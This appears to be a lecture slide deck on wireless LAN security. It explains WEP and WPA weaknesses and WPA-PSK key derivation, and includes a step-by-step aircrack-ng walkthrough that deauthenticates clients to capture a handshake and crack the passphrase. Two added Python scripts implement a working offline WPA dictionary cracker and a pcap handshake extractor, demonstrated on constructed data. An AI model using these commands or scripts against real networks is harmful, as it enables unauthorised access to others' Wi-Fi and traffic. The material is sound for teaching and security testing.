3. WLAN
1) In computing, Wireless LAN or Wireless Local Area
Network is a term for a Local Area Network that
does not need cables to connect the different devices.
2) Instead, radio waves are used to communicate.
7. With Wi-Fi Ports Can Be Easily Cut In Half
[Figure: a representative 12-person workgroup. Devices: 12 VoIP phones, 7 desktop PCs, 5 laptop PCs, 1 wireless AP (mobile devices, guests, etc.), 6 conference room and public area ports, 5 other devices (printer, copier, fax, etc.) and 12 ports reserved for future use. Left panel: existing wired network edge with a 1:1 ratio of ports to devices. Right panel: "right-sized" edge, where one port to an AP supports multiple users and devices simultaneously.]
Wireless is a more efficient, many-to-one access method.
8. Wi-Fi Comes With Problems
The challenging Wi-Fi environment:
• Client density and diversity challenges
• Security against uncontrolled wireless devices and attacks on the infrastructure
• RF noise
• Metal objects with wheels and building materials that block or reflect the signal
9. Security Risk
Uncontrolled Wireless Devices
• Rogue APs
• Laptops acting as bridges between the wired and wireless networks
• Misconfigured WLAN settings on laptops
• Ad hoc networks
Attacks against WLAN infrastructure
• Denial of service / flooding
• Man-in-the-middle
• WEP (Wired Equivalent Privacy) cracking (aircrack-ng is the well-known tool)
• WPA/WPA2 (Wi-Fi Protected Access) cracking (aircrack-ng again, by dictionary attack on the captured handshake)
10. Security Risk
[Diagram: an office network with a server, a legitimate access point and a rogue user. Threats shown: ad hoc connections, access point MAC spoofing and a mis-configured access point.]
And more attacks of this kind.
11. Wireless Standards - 802.11a, 802.11b/g/n, and 802.11ac
• In 1997 the IEEE (Institute of Electrical and
Electronics Engineers) created the first WLAN standard
• It is called 802.11
• The original 802.11 only supports a maximum network
bandwidth of 2 Mbps (too slow for most applications)
12. WLAN Operation
• A Wireless LAN (WLAN) can operate in 2
different frequency ranges
• 2.4 GHz (802.11 b/g/n)
• 4.9 or 5 GHz (802.11 a/h/j/n)
• Note: your wireless card can only be on one
channel at a time (it has a single radio); this matters
later, because sniffing must happen on the target's channel
• Every country regulates the allowed channels, their
permitted uses and the maximum power levels
13. • Fair distribution of clients
across channels
• e.g. the non-overlapping 2.4-GHz channels 1, 6 and 11
• Fair distribution of clients
across bands
• e.g. 2.4 GHz and 5 GHz
[Diagram: three APs on channels 1, 6 and 11.]
17. Wireless Encryption
• The main source of vulnerability in
wireless networks is the encryption method
in use. There are a few different types
of wireless encryption, including:
• WEP
• WPA
• WPA2
18. WEP
• Stands for Wired Equivalent Privacy.
• WEP is recognizable by its key of 10 or
26 hexadecimal digits (a 40-bit or 104-bit key;
marketed as "64-bit" and "128-bit" once the
24-bit IV is counted).
19. WPA or WPA2
• Stands for Wi-Fi Protected Access
• Created to provide stronger security
• Still able to be cracked if a short or common
passphrase is used, because the attack is an
offline dictionary attack on the captured handshake.
• If a long, random passphrase is used,
these protocols are practically uncrackable.
• WPA-PSK, with either TKIP or AES (CCMP), uses a
pre-shared passphrase of 8 to 63 characters
(more than 7 and less than 64) from which the
256-bit Pre-Shared Key (PSK) is derived.
20. Why WPA ?
WEP (Wired Equivalent Privacy) is broken
beyond repair:
whether you use a 64-bit or a 128-bit key, WEP can be broken
21. Weaknesses of WEP
1. Poor key management
• WEP uses the same key for authentication and encryption
• Provides no mechanism for session key
refreshing
• Static key encryption is used, shared by every client
• The 24-bit IV is sent in the clear and repeats; some
IVs are weak and leak key bytes
2. One-way authentication (the client authenticates to
the AP, but the AP never proves its identity to the client)
22. WEP Replacement

                    WPA                                   WPA2
Role                Intermediate solution by the          Long-term solution
                    Wi-Fi Alliance
Cipher / integrity  TKIP (Temporal Key Integrity          CCMP (Counter Mode with Cipher
                    Protocol), based on WEP's RC4         Block Chaining Message Authentication
                                                          Code Protocol), based on AES
Hardware            No hardware change required;          Hardware change required
                    firmware update only                  (AES support)
Personal mode       PSK                                   PSK
Enterprise mode     802.1X + RADIUS                       802.1X + RADIUS
23. Difference between WPA-Personal
& WPA-Enterprise
Wireless Architecture
How to create profile for WPA-Personal
and WPA-Enterprise
24. WEP: Static Key Encryption
[Diagram: client and AP each hold the same static WEP key.]
1. Probe request / response
2. Authentication request / response, association request / response
3. Data encrypted with the static key (the same key for every client and every session)
25. WPA: Non-Static Key
[Diagram: client and AP each hold the same pre-shared key.]
1. Probe request / response
2. Authentication, association
3. A dynamic (per-session) key is generated first
4. Data encrypted with the dynamic key
How are the dynamic keys created?
27. WPA Pre-shared Key
Passphrase (8-63 characters) --PBKDF2--> 256-bit Pre-Shared Key
The derivation runs independently on the client and on the AP; both hold the passphrase, so both obtain the same PSK.
28. PBKDF2
• Password-Based Key Derivation Function 2
• RFC 2898 (PKCS #5)
• PSK = PBKDF2(Passphrase, SSID, ssidLen, 4096, 256)
• The SSID is the salt, so the same passphrase yields
a different PSK on every network (and precomputed
tables only work for one SSID)
• 4096 - number of HMAC-SHA1 iterations applied to the
passphrase
• 256 - intended key length of the PSK, in bits
29. How does the Client know?
• Which SSID and security settings to use? From the Beacon frames
• and from the Probe Response packets the AP sends
• Both are unauthenticated broadcasts, so an attacker can advertise the
same SSID and parameters to create a WPA/WPA2 honeypot as well!
30. How WEP Cracking Works
1) We collect a large number of data
packets
2) A large batch of data packets contains weak IVs
3) We run them through the statistical attack in aircrack-ng
and get the key
Then how do we crack WPA-PSK?
31. Let's "Shake the Hand": the 4-way Handshake
Supplicant (client) and Authenticator (AP) both start from the same 256-bit Pre-Shared Key, after the probe request/response and authentication/association request/response exchanges.
Message 1: AP -> client: ANonce. The client now has everything it needs and computes the PTK.
Message 2: client -> AP: SNonce + MIC. The AP computes the PTK and verifies the MIC.
Message 3: AP -> client: install the key, + MIC.
Message 4: client -> AP: key install acknowledgement. Keys installed on both sides.
32. Pairwise Transient Key
• PTK = Function(PMK, ANonce, SNonce,
Authenticator MAC, Supplicant MAC)
PMK = Pairwise Master Key; for WPA-PSK this is the Pre-Shared Key
ANonce = random number chosen by the AP
SNonce = random number chosen by the client
Authenticator MAC = AP MAC
Supplicant MAC = client MAC
MIC = Message Integrity Check, a keyed hash over the handshake
message computed with a part of the PTK (the KCK). Anyone who
guesses the passphrase can recompute it and confirm the guess,
which is the whole basis of the offline attack.
33. WPA Working: Block Diagram
Passphrase (8-63) --PBKDF2--> 256-bit Pre-Shared Key (PMK)
PMK + SNonce + ANonce + AP MAC + Client MAC --4-way handshake--> PTK
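The chain in slides 27 through 33, carried through in code. This is an added example written for this page, not code from the deck or from the aircrack-ng project: it derives the PSK with PBKDF2, expands it into the PTK with the 802.11i PRF, computes the EAPOL-Key MIC from the KCK, and then runs the same dictionary attack aircrack-ng performs, stopping when a candidate passphrase reproduces the captured MIC. The handshake it cracks is constructed inline (SSID, client MAC, nonces and passphrase are made up; the AP MAC is the deck's example BSSID), so it runs offline without a capture.

```python
"""WPA/WPA2-PSK key derivation and the offline dictionary attack, end to end."""
import hashlib
import hmac


def derive_psk(passphrase: str, ssid: str) -> bytes:
    """PSK = PBKDF2(passphrase, SSID, ssidLen, 4096, 256): HMAC-SHA1, 32 bytes out."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)  # 4 x 160 bits covers the 512 bits needed
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", Min(AA,SPA)||Max(AA,SPA)||Min(nonces)||Max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


# EAPOL-Key layout: 4-byte 802.1X header, then descriptor type(1), key info(2),
# key length(2), replay counter(8), nonce(32), IV(16), RSC(8), ID(8), MIC(16), data len(2)
MIC_OFFSET = 81


def eapol_mic(kck: bytes, eapol: bytes, version: int) -> bytes:
    """MIC over the frame with its MIC field zeroed: v1 = HMAC-MD5 (TKIP), v2 = HMAC-SHA1-128 (CCMP)."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol, version, wordlist):
    """Return the candidate whose derived KCK reproduces the captured MIC, or None."""
    captured = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:  # WPA passphrase length rule; skip impossible entries
            continue
        pmk = derive_psk(cand, ssid)  # the expensive step: 4096 HMAC-SHA1 rounds per guess
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]  # KCK = first 128 bits of the PTK
        if hmac.compare_digest(eapol_mic(kck, eapol, version), captured):
            return cand
    return None


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key message 2 (RSN descriptor, key info 0x010A: version 2, pairwise, MIC set)."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + (1).to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + b"\x00\x00")
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def demo():
    """Constructed handshake: SSID, client MAC, nonces and passphrase are made up."""
    ssid, real_passphrase = "CorpWiFi", "Summer2014!"
    aa = bytes.fromhex("0014bfe0e8d5")           # AP MAC (the deck's example BSSID)
    spa = bytes.fromhex("001d4f9a1b2c")          # client MAC, made up
    anonce = hashlib.sha256(b"anonce").digest()  # stand-ins for the two random nonces
    snonce = hashlib.sha256(b"snonce").digest()
    # Client side: derive the real KCK and stamp a valid MIC into message 2.
    kck = derive_ptk(derive_psk(real_passphrase, ssid), aa, spa, anonce, snonce)[:16]
    msg2 = build_eapol_msg2(snonce, eapol_mic(kck, build_eapol_msg2(snonce), 2))
    # Attacker side: only the sniffed values and a wordlist are available.
    wordlist = ["password", "short", "Summer2013!", "Summer2014!", "letmein123"]
    return crack_psk(ssid, aa, spa, anonce, snonce, msg2, 2, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Two things worth noticing in the loop: everything after the PBKDF2 call is cheap, so the 4096 iterations are the only thing slowing the attacker down, and the salt is the SSID, which is why rainbow tables for WPA exist per popular network name but not in general.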
36. External Wireless Card
• Alfa Networks AWUS036H,
a USB-based card
• Driver already included in
BackTrack and Kali
• Allows packet sniffing
• Allows packet injection
• We will use this in our
demo session
37. Software Setup
• Run Kali Linux in a VM
• Connect the Alfa adapter and pass it through to the VM
38. Understanding Wireless Sniffing
• Wireless: monitor mode
• When you put the card in monitor mode it will
accept every frame it sees on the current
channel, whether or not it is addressed to you
• Kali has a built-in tool that quickly puts the card
into monitor mode so you can sniff the frames
• We will use the tool airmon-ng to put the card into
monitor mode (part of the aircrack-ng suite of tools)
39. Some Basic Terms
• MAC address or physical address is a unique
identifier assigned to a network interface for
communications
• Access point >> wireless router
• SSID (service set identifier) >> network name
• BSSID (basic service set identifier) >> MAC
address of the access point
40. Using Kali Linux or BT
• Some basic BackTrack terms >>
• wlan0 - the wireless interface
• mon0 - the monitor-mode interface created from it
• Handshake: the negotiation process
between the client and the access point when WPA
encryption is used.
Needed to crack WPA/WPA2.
• Dictionary: a file containing a list of common
passwords.
• .cap file: the file used to store captured packets.
41. Tools Used
• airmon-ng >> places wireless cards in monitor
mode
• airodump-ng (packet sniffer) >> used to listen
to the wireless routers in the area and write captures
• aireplay-ng (packet injector) >> used to inject frames.
- Its primary function is to generate traffic for
later use in aircrack-ng when cracking WEP and
WPA-PSK keys (for WPA this means deauthenticating a
client so that it reconnects and performs the handshake).
• aircrack-ng >> cracks WEP keys (statistical attack) and WPA
keys (dictionary attack).
43. Let's Start
airmon-ng lists the wireless
cards that support monitor mode
(monitor mode, not necessarily injection).
The "(monitor mode enabled)"
message means that the card has
successfully been put into monitor
mode. Note the name of the new
monitor interface; mine is mon0.
44. • Airodump will now list
all of the wireless
networks in your area.
45. • airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
Replace [channel] with the
channel of your target
network. Paste the network
BSSID where [bssid] is, and
replace [monitor interface]
with the name of your
monitor-enabled interface
(mon0). -w sets the output
file prefix; the capture lands
in /root/Desktop/ as a .cap file.
46. • airodump-ng will now monitor
only the target network,
allowing us to capture more
specific information about it.
NOTE:
• What we are really doing now is
waiting for a device to connect
or reconnect to the network,
which makes the client and the AP
perform the four-way handshake
that we need to capture in order to
crack the password. Deauthenticating
a connected client with aireplay-ng
forces that reconnect instead of
waiting for it.
48. Upon hitting Enter, you will see aireplay-ng send the deauthentication packets, and within
moments you should see the "WPA handshake:" message, followed by the BSSID, appear in the top right of the airodump-ng screen.
49. Final Step
• aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
• -a is the method aircrack-ng will use to crack the
handshake; 2 = the WPA-PSK method.
-b stands for BSSID; replace [router bssid] with the
BSSID of the target router, mine is 00:14:BF:E0:E8:D5.
-w stands for wordlist; replace [path to wordlist] with
the path to a wordlist that you have downloaded. I
have a wordlist called "wpa.txt" in the root folder.
/root/Desktop/*.cap is the path to the .cap file
containing the captured handshake.
50. If the passphrase is in the wordlist, then aircrack-ng will
show it to you like this
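What aircrack-ng does with the .cap file in slides 45 through 49, before any cracking starts, is pull the handshake parameters out of the capture. The parser below is an added example written for this page, not code from the deck or from aircrack-ng. It reads a classic pcap of raw 802.11 frames (link type 105, no radiotap header), keeps only cleartext data frames that carry an EAPOL-Key packet for the target BSSID, tells messages 1 and 2 apart by their Key Information flags, and returns the AP MAC, client MAC, ANonce, SNonce, the MIC-carrying message 2 and the key descriptor version. The capture it parses is constructed in code (a beacon plus messages 1 and 2 with made-up client MAC and nonces, and the deck's example BSSID); it is not a real recording.

```python
"""Extract 4-way handshake parameters from a .cap (classic pcap, raw 802.11 frames)."""
import struct

LINKTYPE_IEEE802_11 = 105
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"  # SNAP header with EtherType 0x888E


def pcap_packets(data: bytes):
    """Yield each packet's bytes from a classic pcap, honouring the file's byte order."""
    if data[:4] == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif data[:4] == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    if linktype != LINKTYPE_IEEE802_11:
        raise ValueError("expected raw 802.11 frames (link type 105), got %d" % linktype)
    off = 24
    while off + 16 <= len(data):
        caplen = struct.unpack(endian + "IIII", data[off:off + 16])[2]
        yield data[off + 16:off + 16 + caplen]
        off += 16 + caplen


def eapol_key_from_frame(frame: bytes):
    """Return (bssid, client, eapol) if the frame is a cleartext data frame carrying EAPOL-Key."""
    if len(frame) < 24:
        return None
    fc = struct.unpack("<H", frame[:2])[0]
    ftype, subtype = (fc >> 2) & 3, (fc >> 4) & 0xF
    if ftype != 2 or fc & 0x4000:  # data frames only; skip Protected (encrypted) frames
        return None
    to_ds, from_ds = bool(fc & 0x0100), bool(fc & 0x0200)
    addr1, addr2 = frame[4:10], frame[10:16]
    if from_ds and not to_ds:      # AP -> station: addr1 = DA (client), addr2 = BSSID
        bssid, client = addr2, addr1
    elif to_ds and not from_ds:    # station -> AP: addr1 = BSSID, addr2 = SA (client)
        bssid, client = addr1, addr2
    else:
        return None
    hdr = 24 + (2 if subtype & 0x8 else 0)  # QoS data subtypes add a 2-byte QoS control field
    if frame[hdr:hdr + 8] != LLC_SNAP_EAPOL:
        return None
    eapol = frame[hdr + 8:]
    if len(eapol) < 99 or eapol[1] != 3:  # 802.1X packet type 3 = EAPOL-Key; 99 = fixed fields
        return None
    return bssid, client, eapol


def extract_handshake(pcap: bytes, target_bssid: bytes):
    """Collect ANonce (message 1) and SNonce plus the MIC'd frame (message 2) for one BSSID."""
    found = {}
    for frame in pcap_packets(pcap):
        parsed = eapol_key_from_frame(frame)
        if parsed is None or parsed[0] != target_bssid:
            continue
        _, client, eapol = parsed
        key_info = struct.unpack(">H", eapol[5:7])[0]
        nonce = eapol[17:49]
        install, ack, mic = key_info & 0x40, key_info & 0x80, key_info & 0x100
        if ack and not mic:                                   # message 1: ANonce, no MIC yet
            found.update(anonce=nonce, client=client)
        elif mic and not ack and not install and any(nonce):  # message 2; message 4 usually has a zero nonce
            found.update(snonce=nonce, eapol=eapol, version=key_info & 7)
    if {"anonce", "snonce"} <= found.keys():
        return {"ap": target_bssid, **found}
    return None


# Constructed sample capture: beacon + handshake messages 1 and 2 (made-up client MAC and nonces).
def _eapol_key(key_info: int, nonce: bytes) -> bytes:
    body = (b"\x02" + key_info.to_bytes(2, "big") + b"\x00\x10" + (1).to_bytes(8, "big")
            + nonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x00")
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def _data_frame(to_ds: bool, addr1: bytes, addr2: bytes, addr3: bytes, payload: bytes) -> bytes:
    fc = 0x0008 | (0x0100 if to_ds else 0x0200)  # type data, subtype 0, ToDS or FromDS
    return struct.pack("<H", fc) + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00" + LLC_SNAP_EAPOL + payload


def build_sample_pcap() -> bytes:
    ap, sta = bytes.fromhex("0014bfe0e8d5"), bytes.fromhex("001d4f9a1b2c")
    anonce, snonce = bytes([0x11]) * 32, bytes([0x22]) * 32
    beacon = struct.pack("<H", 0x0080) + b"\x00\x00" + b"\xff" * 6 + ap + ap + b"\x00\x00" + bytes(12)
    frames = [beacon,
              _data_frame(False, sta, ap, ap, _eapol_key(0x008A, anonce)),  # msg 1: AP -> STA
              _data_frame(True, ap, sta, ap, _eapol_key(0x010A, snonce))]   # msg 2: STA -> AP
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    hs = extract_handshake(build_sample_pcap(), bytes.fromhex("0014bfe0e8d5"))
    print({k: (v.hex() if isinstance(v, bytes) else v) for k, v in hs.items()})
```

The returned dictionary is exactly the input the cracking step needs: AP and client MACs, both nonces, the descriptor version that picks HMAC-MD5 or HMAC-SHA1 for the MIC, and the raw message 2 whose MIC field is the value a candidate passphrase has to reproduce. Real airodump-ng captures usually carry a radiotap header (link type 127); stripping it is a matter of reading its little-endian length field at offset 2 before handing the frame to eapol_key_from_frame.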